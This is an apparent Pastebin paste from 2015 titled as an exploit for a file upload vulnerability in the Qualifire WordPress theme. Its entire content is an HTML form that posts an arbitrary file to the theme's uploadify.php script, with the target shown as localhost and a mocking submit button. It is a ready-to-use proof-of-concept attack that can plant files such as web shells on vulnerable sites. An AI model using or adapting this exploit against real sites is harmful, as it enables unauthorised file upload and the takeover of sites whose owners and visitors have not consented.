Advertisement
jackwilder

Exploit Themes Qualifire File Upload Vulnerability

Jun 6th, 2015
1,826
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.31 KB | None | 0 0
  1. <form
  2.    action="http://localhost/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
  3.    method="post"
  4.    enctype="multipart/form-data">
  5.     <label for="file">Filename:</label>
  6.     <input type="file" name="Filedata" ><br>
  7.     <input type="submit" name="submit" value="Suck It !">
  8.     </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement